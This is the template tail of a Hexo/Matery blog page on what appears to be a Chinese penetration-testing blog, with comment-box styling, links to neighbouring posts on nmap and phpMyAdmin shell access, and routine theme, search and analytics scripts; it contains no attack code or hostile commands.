        cursor: pointer;
    }
    #waline ol li {
        list-style-type: decimal;
    }
    #waline ol,
    ul {
        display: block;
        padding-left: 2em;
        word-spacing: 0.05rem;
    }
    #waline ul li,
    ol li {
        display: list-item;
        line-height: 1.8rem;
        font-size: 1rem;
    }
    #waline ul li {
        list-style-type: disc;
    }
    #waline ul ul li {
        list-style-type: circle;
    }
    #waline table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }
    #waline table, th, td {
        border: 0;
    }
    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }
    #waline table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }
    #waline table td {
        min-width: 80px;
    }
    #waline h1 {
        font-size: 1.85rem;
        font-weight: bold;
        line-height: 2.2rem;
    }
    #waline h2 {
        font-size: 1.65rem;
        font-weight: bold;
        line-height: 1.9rem;
    }
    #waline h3 {
        font-size: 1.45rem;
        font-weight: bold;
        line-height: 1.7rem;
    }
    #waline h4 {
        font-size: 1.25rem;
        font-weight: bold;
        line-height: 1.5rem;
    }
    #waline h5 {
        font-size: 1.1rem;
        font-weight: bold;
        line-height: 1.4rem;
    }
    #waline h6 {
        font-size: 1rem;
        line-height: 1.3rem;
    }
    #waline p {
        font-size: 1rem;
        line-height: 1.5rem;
    }
    #waline hr {
        margin: 12px 0;
        border: 0;
        border-top: 1px solid #ccc;
    }
    #waline blockquote {
        margin: 15px 0;
        border-left: 5px solid #42b983;
        padding: 1rem 0.8rem 0.3rem 0.8rem;
        color: #666;
        background-color: rgba(66, 185, 131, .1);
    }
    #waline pre {
        font-family: monospace, monospace;
        padding: 1.2em;
        margin: .5em 0;
        background: #272822;
        overflow: auto;
        border-radius: 0.3em;
        tab-size: 4;
    }
    #waline code {
        font-family: monospace, monospace;
        padding: 1px 3px;
        font-size: 0.92rem;
        color: #e96900;
        background-color: #f8f8f8;
        border-radius: 2px;
    }
    #waline pre code {
        font-family: monospace, monospace;
        padding: 0;
        color: #e8eaf6;
        background-color: #272822;
    }
    #waline pre[class*="language-"] {
        padding: 1.2em;
        margin: .5em 0;
    }
    #waline code[class*="language-"],
    pre[class*="language-"] {
        color: #e8eaf6;
    }
    #waline [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }
    #waline b,
    strong {
        font-weight: bold;
    }
    #waline dfn {
        font-style: italic;
    }
    #waline small {
        font-size: 85%;
    }
    #waline cite {
        font-style: normal;
    }
    #waline mark {
        background-color: #fcf8e3;
        padding: .2em;
    }
    #waline table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }
    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }
    #waline table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }
    #waline table td {
        min-width: 80px;
    }
    #waline [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }
  </style>
  
  <div class="card waline-card" data-aos="fade-up">
    <div class="comment_headling" style="font-size: 20px; font-weight: 700; position: relative; padding-left: 20px; top: 15px; padding-bottom: 5px;">
        <i class="fas fa-comments fa-fw" aria-hidden="true"></i>
        <span>评论</span>
    </div>
    <div id="waline" class="card-content" style="display: grid">
    </div>
  </div>
  

  <!-- <script src="//cdn.jsdelivr.net/npm/@waline/client"></script> -->
  <script src="/libs/waline/Waline.min.js"></script>
  <script>
    new Waline({
        el: '#waline',
        serverURL: 'https://waline.your-domain.com',
        avatar: 'mm'    
    });
  </script> 
    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2023/08/01/nmap/">
                    <div class="card-image">
                        
                        <img src="/images/64.jpg" class="responsive-img" alt="nmap">
                        
                        <span class="card-title">nmap</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2023-08-01
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/%E6%B8%97%E9%80%8F/" class="post-category">
                                    渗透
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/nmap/">
                        <span class="chip bg-color">nmap</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2023/07/27/phpmyadmin%E5%90%8E%E5%8F%B0mysqlgetshell%E5%A7%BF%E5%8A%BF/">
                    <div class="card-image">
                        
                        <img src="/images/62.jpg" class="responsive-img" alt="phpmyadmin后台mysqlgetshell姿势">
                        
                        <span class="card-title">phpmyadmin后台mysqlgetshell姿势</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2023-07-27
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/%E6%B8%97%E9%80%8F/" class="post-category">
                                    渗透
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/getshell%E5%A7%BF%E5%8A%BF/">
                        <span class="chip bg-color">getshell姿势</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>


<script>
    $('#articleContent').on('copy', function (e) {
        // IE8 or earlier browser is 'undefined'
        if (typeof window.getSelection === 'undefined') return;

        var selection = window.getSelection();
        // if the selection is short let's not annoy our users.
        if (('' + selection).length < Number.parseInt('120')) {
            return;
        }

        // create a div outside of the visible area and fill it with the selected text.
        var bodyElement = document.getElementsByTagName('body')[0];
        var newdiv = document.createElement('div');
        newdiv.style.position = 'absolute';
        newdiv.style.left = '-99999px';
        bodyElement.appendChild(newdiv);
        newdiv.appendChild(selection.getRangeAt(0).cloneContents());

        // we need a <pre> tag workaround.
        // otherwise the text inside "pre" loses all the line breaks!
        if (selection.getRangeAt(0).commonAncestorContainer.nodeName === 'PRE' || selection.getRangeAt(0).commonAncestorContainer.nodeName === 'CODE') {
            newdiv.innerHTML = "<pre>" + newdiv.innerHTML + "</pre>";
        }

        var url = document.location.href;
        newdiv.innerHTML += '<br />'
            + '来源: f14g<br />'
            + '文章作者: f14g<br />'
            + '文章链接: <a href="' + url + '">' + url + '</a><br />'
            + '本文章著作权归作者所有，任何形式的转载都请注明出处。';

        selection.selectAllChildren(newdiv);
        window.setTimeout(function () {bodyElement.removeChild(newdiv);}, 200);
    });
</script>


<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>


  <!-- 是否加载使用自带的 prismjs. -->
  <script type="text/javascript" src="/libs/prism/prism.min.js"></script>


<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>



    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="/libs/aplayer/Meting.min.js"></script>

    

    <div class="container row center-align"
         style="margin-bottom: 15px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2023</span>
            
            <a href="/about" target="_blank">f14g</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            
                <span id="translate">|&nbsp;繁/简：</span><a id="translateLink" href="javascript:translatePage();">繁</a>
            
            <br>
            
                &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                        class="white-color">72.1k</span>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
                <span id="sitetime"> Loading ...</span>
                <script>
                    var calcSiteTime = function () {
                        var seconds = 1000;
                        var minutes = seconds * 60;
                        var hours = minutes * 60;
                        var days = hours * 24;
                        var years = days * 365;
                        var today = new Date();
                        var startYear = "2023";
                        var startMonth = "1";
                        var startDate = "1";
                        var startHour = "0";
                        var startMinute = "0";
                        var startSecond = "0";
                        var todayYear = today.getFullYear();
                        var todayMonth = today.getMonth() + 1;
                        var todayDate = today.getDate();
                        var todayHour = today.getHours();
                        var todayMinute = today.getMinutes();
                        var todaySecond = today.getSeconds();
                        var t1 = Date.UTC(startYear, startMonth, startDate, startHour, startMinute, startSecond);
                        var t2 = Date.UTC(todayYear, todayMonth, todayDate, todayHour, todayMinute, todaySecond);
                        var diff = t2 - t1;
                        var diffYears = Math.floor(diff / years);
                        var diffDays = Math.floor((diff / days) - diffYears * 365);

                        // 区分是否有年份.
                        var language = 'zh-CN';
                        if (startYear === String(todayYear)) {
                            document.getElementById("year").innerHTML = todayYear;
                            var daysTip = 'This site has been running for ' + diffDays + ' days';
                            if (language === 'zh-CN') {
                                daysTip = '本站已运行 ' + diffDays + ' 天';
                            } else if (language === 'zh-HK') {
                                daysTip = '本站已運行 ' + diffDays + ' 天';
                            }
                            document.getElementById("sitetime").innerHTML = daysTip;
                        } else {
                            document.getElementById("year").innerHTML = startYear + " - " + todayYear;
                            var yearsAndDaysTip = 'This site has been running for ' + diffYears + ' years and '
                                + diffDays + ' days';
                            if (language === 'zh-CN') {
                                yearsAndDaysTip = '本站已运行 ' + diffYears + ' 年 ' + diffDays + ' 天';
                            } else if (language === 'zh-HK') {
                                yearsAndDaysTip = '本站已運行 ' + diffYears + ' 年 ' + diffDays + ' 天';
                            }
                            document.getElementById("sitetime").innerHTML = yearsAndDaysTip;
                        }
                    }

                    calcSiteTime();
                </script>
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/f14g-orz" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:f14g_orz0823@163.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=985220675" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 985220675" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 白天和黑夜主题 -->
<div class="stars-con">
    <div id="stars"></div>
    <div id="stars2"></div>
    <div id="stars3"></div>  
</div>

<script>
    function switchNightMode() {
        $('<div class="Cuteen_DarkSky"><div class="Cuteen_DarkPlanet"></div></div>').appendTo($('body')),
        setTimeout(function () {
            $('body').hasClass('DarkMode') 
            ? ($('body').removeClass('DarkMode'), localStorage.setItem('isDark', '0'), $('#sum-moon-icon').removeClass("fa-sun").addClass('fa-moon')) 
            : ($('body').addClass('DarkMode'), localStorage.setItem('isDark', '1'), $('#sum-moon-icon').addClass("fa-sun").removeClass('fa-moon')),
            
            setTimeout(function () {
            $('.Cuteen_DarkSky').fadeOut(1e3, function () {
                $(this).remove()
            })
            }, 2e3)
        })
    }
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    

    
        <script type="text/javascript" src="/js/tw_cn.js"></script>
        <script type="text/javascript">
          var defaultEncoding = 2; //网站编写字体是否繁体，1-繁体，2-简体
          var translateDelay = 0; //延迟时间,若不在前, 要设定延迟翻译时间, 如100表示100ms,默认为0
          var cookieDomain = "http://example.com"; //Cookie地址, 一定要设定, 通常为你的网址
          var msgToTraditionalChinese = "繁"; //此处可以更改为你想要显示的文字
          var msgToSimplifiedChinese = "简"; //同上，但两处均不建议更改
          var translateButtonId = "translateLink"; //默认互换id
          translateInitilization();
        </script>
    
    
    
        
        <script type="text/javascript">
            // 只在桌面版网页启用特效
            var windowWidth = $(window).width();
            if (windowWidth > 768) {
                document.write('<script type="text/javascript" src="/libs/others/sakura.js"><\/script>');
            }
        </script>
    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
     
        <script type="text/javascript">
            // 只在桌面版网页启用特效
            var windowWidth = $(window).width();
            if (windowWidth > 768) {
                document.write('<script type="text/javascript" src="/libs/others/star.js"><\/script>');
            }
        </script>
    

     
        <script src="https://ssl.captcha.qq.com/TCaptcha.js"></script>
        <script src="/libs/others/TencentCaptcha.js"></script>
        <button id="TencentCaptcha" data-appid="xxxxxxxxxx" data-cbfn="callback" type="button" hidden></button>
    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    
    <script type="text/javascript" color="0,0,255"
        pointColor="0,0,255" opacity='0.7'
        zIndex="-1" count="99"
        src="/libs/background/canvas-nest.js"></script>
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
